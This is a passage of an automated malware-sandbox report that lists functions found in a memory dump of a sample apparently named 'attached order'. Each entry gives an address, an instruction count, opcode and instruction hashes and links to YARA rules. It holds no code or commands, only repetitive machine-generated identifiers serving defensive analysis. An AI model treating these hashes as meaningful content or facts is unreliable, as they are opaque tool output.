                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2212fe4d523fbcc0fc6e0baffcac545e7052bc82e8bafe724f5294e6512600fd
                                                                                          • Instruction ID: 92ff26993eb563b77bf4cedac55b67353690d565eecda0bca8de470a78a07019
                                                                                          • Opcode Fuzzy Hash: 2212fe4d523fbcc0fc6e0baffcac545e7052bc82e8bafe724f5294e6512600fd
                                                                                          • Instruction Fuzzy Hash: 1EF0277068D248CFCB06DF6498107793BB5DB8A200F1461AAC00DC73CBDB344D04CB61
                                                                                          Function 0BA77740 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ccd920f762d7718f811b24cd657b91b7d9a4bdacb05ff2004af0b390be285755
                                                                                          • Instruction ID: 9322289977e46d76c34564c6c75df2757bb474f0e1cd645e674461c8e4d51b66
                                                                                          • Opcode Fuzzy Hash: ccd920f762d7718f811b24cd657b91b7d9a4bdacb05ff2004af0b390be285755
                                                                                          • Instruction Fuzzy Hash: 4EF0E230D4A348DFCB00EF78C914A69BBB4EF46611F204699C828D33D6EB344E48CB52
                                                                                          Function 0BA76F88 Relevance: .0, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ff7e6ab20e716b7674b814b1ca62b206bca060cc230bbe6bf39b692d4dc7526f
                                                                                          • Instruction ID: 5eeb01266f0f9fb30e656d3b54b78edc1db56751dfd062a97a011a911a3c1363
                                                                                          • Opcode Fuzzy Hash: ff7e6ab20e716b7674b814b1ca62b206bca060cc230bbe6bf39b692d4dc7526f
                                                                                          • Instruction Fuzzy Hash: B8F0B774D4D608EFCF44EFA99D016ADB7B9EB4A700F1095AA9828A3341D7741A458B80
                                                                                          Function 0BA76380 Relevance: .0, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3d1a5f60070247ceca4d98f7059df5978941c25cb2a069da4f1888248b0bad77
                                                                                          • Instruction ID: bce8dca1145915f13095a49d9ebed399e6dc5943aaa4ddbb1d2ec131edb11aee
                                                                                          • Opcode Fuzzy Hash: 3d1a5f60070247ceca4d98f7059df5978941c25cb2a069da4f1888248b0bad77
                                                                                          • Instruction Fuzzy Hash: 98F05832B09118AFDF18EFA8DD41D9E7BFAEF48214B1580AAE408D7265E670E904CB54
                                                                                          Function 0BA75760 Relevance: .0, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7e17b1b68afcef2d15e4e1b015b4e73c9f8346ca42bd65474ffccbda6c252b1f
                                                                                          • Instruction ID: b5a0199dc4b5b49630bca73287be5489b456cc0804bb2e11dc39bcf86aea1b0b
                                                                                          • Opcode Fuzzy Hash: 7e17b1b68afcef2d15e4e1b015b4e73c9f8346ca42bd65474ffccbda6c252b1f
                                                                                          • Instruction Fuzzy Hash: 49F0DA74D8C208EFCF44EFA9DD016ADB7F9EB59700F1099AA882993301D7705A518F80
                                                                                          Function 0BA74D00 Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4491a713a4a3e70885ac0906230a7565051d5a07ef71deb4abfa2cd25560ba13
                                                                                          • Instruction ID: 3d3104c7310002e20c6d35d7600281d7c5b4c65ff5f866d45a9422e65ac248e3
                                                                                          • Opcode Fuzzy Hash: 4491a713a4a3e70885ac0906230a7565051d5a07ef71deb4abfa2cd25560ba13
                                                                                          • Instruction Fuzzy Hash: 2FF01730D49248AFDB41DBA88840A9CBFB0EB4A210B1485AEC848D7342D6354A06CF41
                                                                                          Function 0BA702CB Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5e28c22e80338042654b38fd535df0333ac350d980ceb8e1c1d92547e28576d5
                                                                                          • Instruction ID: e4939a8624a1acc899a9077ad1f0cbf3671d434847cce1aa2eac10f0140f4623
                                                                                          • Opcode Fuzzy Hash: 5e28c22e80338042654b38fd535df0333ac350d980ceb8e1c1d92547e28576d5
                                                                                          • Instruction Fuzzy Hash: 46F0F971D04218CFCF26EFA4D84869EBB71FF42315F0591A9D206A7150D7328891CB80
                                                                                          Function 0BA75B27 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 06a0883a49779ca423121d2dd597b2cded21a365ffcdd9925477c09dbf325ad4
                                                                                          • Instruction ID: 19c580139574ab1fe589a4d77b5c288076febbb75ce7ccb0e927fda9a4f68da0
                                                                                          • Opcode Fuzzy Hash: 06a0883a49779ca423121d2dd597b2cded21a365ffcdd9925477c09dbf325ad4
                                                                                          • Instruction Fuzzy Hash: 23F0FE30D49248AFCB45DFA8C9516ACBFF0EF8A210F1481EAC859D7352D7355A06DF41
                                                                                          Function 0BA79932 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8c37a8cf8fddb72fb26e1277d2fe72529268a4e53b5f15cf93c13b8e474c9e18
                                                                                          • Instruction ID: b87bf613763c6e4d7554b573f07555448979eb621e3dfe8a435290e65713a28b
                                                                                          • Opcode Fuzzy Hash: 8c37a8cf8fddb72fb26e1277d2fe72529268a4e53b5f15cf93c13b8e474c9e18
                                                                                          • Instruction Fuzzy Hash: 11F0B470A8E348EFDF44EB55CCD4AAB77BAAF49604F1090AAC019A7135C7301944CB02
                                                                                          Function 0BA74D60 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 44873f2b055ca37668821a9d66d6cc5bc26bd368494a6a27f1169f112642fbda
                                                                                          • Instruction ID: 4c1414266650951b63979bf3322bc1e5c6172b167d585b14d9a69108a29abfac
                                                                                          • Opcode Fuzzy Hash: 44873f2b055ca37668821a9d66d6cc5bc26bd368494a6a27f1169f112642fbda
                                                                                          • Instruction Fuzzy Hash: 0FF01C74E8C208EFEF40EFA5D945AADB7BCEB4D700F1090A9889893302EB345A41CB40
                                                                                          Function 0BA77608 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0bfbbd165d1cd249add487d732a9f6569537dd2af15b83cb0abce52d7905a926
                                                                                          • Instruction ID: 9abd94c08d17416238d6080686f8a587250ae5c9c1879882fdea437af79ea2d9
                                                                                          • Opcode Fuzzy Hash: 0bfbbd165d1cd249add487d732a9f6569537dd2af15b83cb0abce52d7905a926
                                                                                          • Instruction Fuzzy Hash: 76F03074D8D208EFCF44EFA9D9416ACFBB8EB49700F1091AA8828A3349E7305E41CF44
                                                                                          Function 0BA77668 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a60bdcc3ae751fc677457d7d33e3c9be22cc251da987cdf5955c044ef858a134
                                                                                          • Instruction ID: 2abfa8bd200d94b2187f62fe8a5e958d196fb8326712b445ff77a8afcfb7f264
                                                                                          • Opcode Fuzzy Hash: a60bdcc3ae751fc677457d7d33e3c9be22cc251da987cdf5955c044ef858a134
                                                                                          • Instruction Fuzzy Hash: 24F0AC74E8D308EFCF44EFA9D9416ADBBB8EB49601F1091AA8419A3349E7355E51CF40
                                                                                          Function 0BA76F27 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cd74ccc48ba6e42bbb09777e8e7341de5fd9e90ddab74a301529da10a6147350
                                                                                          • Instruction ID: b20fbfd3a075925117f410a5afab6a657ee97114758947c142ccb81593ded703
                                                                                          • Opcode Fuzzy Hash: cd74ccc48ba6e42bbb09777e8e7341de5fd9e90ddab74a301529da10a6147350
                                                                                          • Instruction Fuzzy Hash: 70F01774E48248AFCF05DFA8D940ADCBFF0AF49320F1481AAC849D7262C6364A56DF44
                                                                                          Function 0BA75702 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 359c49a39cb32e48ef8511098797f24b238b8af5afa7cf2cdec4916bde20a984
                                                                                          • Instruction ID: a85a2875b496af7e23e3648fa625168d36169e9db7261b7ab6ddef3430f86233
                                                                                          • Opcode Fuzzy Hash: 359c49a39cb32e48ef8511098797f24b238b8af5afa7cf2cdec4916bde20a984
                                                                                          • Instruction Fuzzy Hash: 69F05834D48248EFCB41DFA8C940AADBFB0EF9A210F1485AAD808E7342D3354A16DF44
                                                                                          Function 0BA799F3 Relevance: .0, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a375ce128b88c00945aa5ae82759283578a5548fb71db27ec1c5ee880a6f2c3f
                                                                                          • Instruction ID: d08a86cbc98449b72fed0c198afb96d5e060a508aac32cea6fd8afcab2e8598a
                                                                                          • Opcode Fuzzy Hash: a375ce128b88c00945aa5ae82759283578a5548fb71db27ec1c5ee880a6f2c3f
                                                                                          • Instruction Fuzzy Hash: CEF0E27094E345EFCF41EF54CD905AE7779AF05500F1054DAD0499B132C6700A44CB02
                                                                                          Function 0BA75C50 Relevance: .0, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8e780eebedd958ba64821bafb8fddb694c2c97759b33a961be3b79bd97c61992
                                                                                          • Instruction ID: 47ae9864f40003dbef8650feb5d3b2c762812a916c5b9c16dc1d5c019defe9fc
                                                                                          • Opcode Fuzzy Hash: 8e780eebedd958ba64821bafb8fddb694c2c97759b33a961be3b79bd97c61992
                                                                                          • Instruction Fuzzy Hash: 28F01234E48248AFCF45DFA8D884AACBFB0EF59310F1481AAE85897352D2329A55DB40
                                                                                          Function 0BA7960B Relevance: .0, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5d34a15f9e70293e0434bfdbef74d8138983fe38dee40a389fb5b3f789670de9
                                                                                          • Instruction ID: 845ca82804a4971e3b09000ad23cf93e3a6e249ba5a331b439c733f2debd347d
                                                                                          • Opcode Fuzzy Hash: 5d34a15f9e70293e0434bfdbef74d8138983fe38dee40a389fb5b3f789670de9
                                                                                          • Instruction Fuzzy Hash: F6F0DF70949288EFCB06EFA8944069DBFB4AF5A310F2486AED884A7252D3354A55DF44
                                                                                          Function 0BA74611 Relevance: .0, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 456ffb252efcb8db337e2bf7687ab280551982f81551002df3e5c2ea39f7cb85
                                                                                          • Instruction ID: 60f46c97785d6048c6ed4c717b2b62b7c7437aeefd6696458924a9eefcff47a6
                                                                                          • Opcode Fuzzy Hash: 456ffb252efcb8db337e2bf7687ab280551982f81551002df3e5c2ea39f7cb85
                                                                                          • Instruction Fuzzy Hash: C8E06D3458D1C89FCB01DB609821AF8BFB8AF47214B1845DECC4D97393DB364902CB41
                                                                                          Function 0BA77750 Relevance: .0, Instructions: 27COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fc6b0923de947a10f7ee5a5c18bcfa97781aace4d7151bb3149b769874bc9278
                                                                                          • Instruction ID: 132946a22a39a7e63c2d704c71bcfa24e2f0b036c652c22def8dd62b09a3c975
                                                                                          • Opcode Fuzzy Hash: fc6b0923de947a10f7ee5a5c18bcfa97781aace4d7151bb3149b769874bc9278
                                                                                          • Instruction Fuzzy Hash: EBE09270D4920CDFCB00EFA8DA14B7DBBB8EF49601F2045A88809E3389EB305E44CB95
                                                                                          Function 0BA74BA8 Relevance: .0, Instructions: 26COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 44057cc84cc36eb962f224a7e354eb4fc3cf83a25a2e04bb5a0acef843e8dfd0
                                                                                          • Instruction ID: adc9d6adc94e05481bc2e63093c84e420005bca18e504afc1d1f21cbf8c8240b
                                                                                          • Opcode Fuzzy Hash: 44057cc84cc36eb962f224a7e354eb4fc3cf83a25a2e04bb5a0acef843e8dfd0
                                                                                          • Instruction Fuzzy Hash: A9E0DF30A8D20CDBCB00EFA8D90477A73F9EB8A701F1055A8850993386DF349E0086A6
                                                                                          Function 0BA74C3F Relevance: .0, Instructions: 26COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7e497edf0070afac43037abc04853dafc9c0738e5831122e9e4bcaf662a98ef2
                                                                                          • Instruction ID: aee297c8eeb359572d4d70dc2a0d690cc106a7bad856d0390395cfe860ac241b
                                                                                          • Opcode Fuzzy Hash: 7e497edf0070afac43037abc04853dafc9c0738e5831122e9e4bcaf662a98ef2
                                                                                          • Instruction Fuzzy Hash: 2AE065309492449FCF05DF64D85199C7F709F86214F1481E9C84857387C7314D0ACB52
                                                                                          Function 0BA75C60 Relevance: .0, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0eb9352fe6e774f9af83b2900002a2a4e5d0cbd112ca918390aef541e712e3a7
                                                                                          • Instruction ID: 481884614c00e97c81b2c4a0b9eb03d147c9c042bcfcbd3a394f82c710c21185
                                                                                          • Opcode Fuzzy Hash: 0eb9352fe6e774f9af83b2900002a2a4e5d0cbd112ca918390aef541e712e3a7
                                                                                          • Instruction Fuzzy Hash: 74F0A574E44208EFCB84EFA8D944A9CBBB5EF58310F10C5AA9C5893341D7329A52DF40
                                                                                          Function 0BA7477A Relevance: .0, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1980e353c43c5a5f2a86ba3d50bf678b336ae352e6f4d9c68a17e929186f5085
                                                                                          • Instruction ID: 8151e639c71e36f19f69b1bf8f75f1d5921fa22bd693427ed77bf659f2cec141
                                                                                          • Opcode Fuzzy Hash: 1980e353c43c5a5f2a86ba3d50bf678b336ae352e6f4d9c68a17e929186f5085
                                                                                          • Instruction Fuzzy Hash: D0E0C239949108AFCF04DFA4D980AECBF71EB5A221F249199D85927352C7324A96DB40
                                                                                          Function 0BA76F38 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7117dd3cb35a56da915fb61c07ac1c0973f64d19d2f62abac2335378133d8e0d
                                                                                          • Instruction ID: 3a62f8a1b835fb5297f01521472b22647aaf81ebc51985269b75aaf330150927
                                                                                          • Opcode Fuzzy Hash: 7117dd3cb35a56da915fb61c07ac1c0973f64d19d2f62abac2335378133d8e0d
                                                                                          • Instruction Fuzzy Hash: 9DE0C974D44208EFCB44DFA8D940B9CBBF4EF48310F10C5A9981893341D7319A55DF84
                                                                                          Function 0BA75710 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7117dd3cb35a56da915fb61c07ac1c0973f64d19d2f62abac2335378133d8e0d
                                                                                          • Instruction ID: 813a1ebc545ee349305d9fbc7b242cdb2cc0e194b25a948c94bc030e5bba1cea
                                                                                          • Opcode Fuzzy Hash: 7117dd3cb35a56da915fb61c07ac1c0973f64d19d2f62abac2335378133d8e0d
                                                                                          • Instruction Fuzzy Hash: 2EE0C974D4420CEFCB44DFA8D941A9CBBB4EF58310F10C5A99818A3341D7319A52DF44
                                                                                          Function 0BA75B38 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5750abd9b0e2a48d6cd706483ba8cebd5313a212610aadb3f07c2f3b34cf7755
                                                                                          • Instruction ID: b8f32e1e8ca3a5320bb1b99f0f4a54517433441cb2ceae791dc8cb8c3f9ea64d
                                                                                          • Opcode Fuzzy Hash: 5750abd9b0e2a48d6cd706483ba8cebd5313a212610aadb3f07c2f3b34cf7755
                                                                                          • Instruction Fuzzy Hash: 9CE0E574E44208EFCB44EFA8D9406ACBBF4EF88300F20C5A98818A3341E7319A42CF40
                                                                                          Function 0BA779C8 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5750abd9b0e2a48d6cd706483ba8cebd5313a212610aadb3f07c2f3b34cf7755
                                                                                          • Instruction ID: 3576a7c4c66c6de32a995356d883de3c44ef35eb04ce8d1aa1f88f3856f4e6b5
                                                                                          • Opcode Fuzzy Hash: 5750abd9b0e2a48d6cd706483ba8cebd5313a212610aadb3f07c2f3b34cf7755
                                                                                          • Instruction Fuzzy Hash: BBE0E574E45208EFCB94EFA8D9516ACBBF4EF88200F20C5A9881893345D7319A42CF41
                                                                                          Function 0BA74D10 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5750abd9b0e2a48d6cd706483ba8cebd5313a212610aadb3f07c2f3b34cf7755
                                                                                          • Instruction ID: 6686cf2f0cc0504f4b67a022174585039e59da31f99b16f0d34a9e0b76b8b457
                                                                                          • Opcode Fuzzy Hash: 5750abd9b0e2a48d6cd706483ba8cebd5313a212610aadb3f07c2f3b34cf7755
                                                                                          • Instruction Fuzzy Hash: F2E0ED74D4420CEFCB44DFA8D940A9CB7F4EF48200F1085A9885893341D7315A42CF44
                                                                                          Function 0BA79618 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4531b28eec9ca5e4e37e7b470be5c39a7ba137a78902112889188cceb3a83455
                                                                                          • Instruction ID: 9df2a3f281578ce5b2df2b4bece8a042442a8af1572d32c31f08c053ddbd3181
                                                                                          • Opcode Fuzzy Hash: 4531b28eec9ca5e4e37e7b470be5c39a7ba137a78902112889188cceb3a83455
                                                                                          • Instruction Fuzzy Hash: 9CE0E570D4520CEFCB04EFA8D80069DBBB9EF49700F2085AA9804A3340D7359A51DF84
                                                                                          Function 0BA775B8 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5750abd9b0e2a48d6cd706483ba8cebd5313a212610aadb3f07c2f3b34cf7755
                                                                                          • Instruction ID: 5e742b98f7489ca9e13ec82aeda386488f912f99a6b2d50d67d9aee3ddf037a5
                                                                                          • Opcode Fuzzy Hash: 5750abd9b0e2a48d6cd706483ba8cebd5313a212610aadb3f07c2f3b34cf7755
                                                                                          • Instruction Fuzzy Hash: 6EE0C974D44208EFCB44DFA8D94069CB7B4EF48200F1085A9881893341D7319A42CB40
                                                                                          Function 0BA74780 Relevance: .0, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
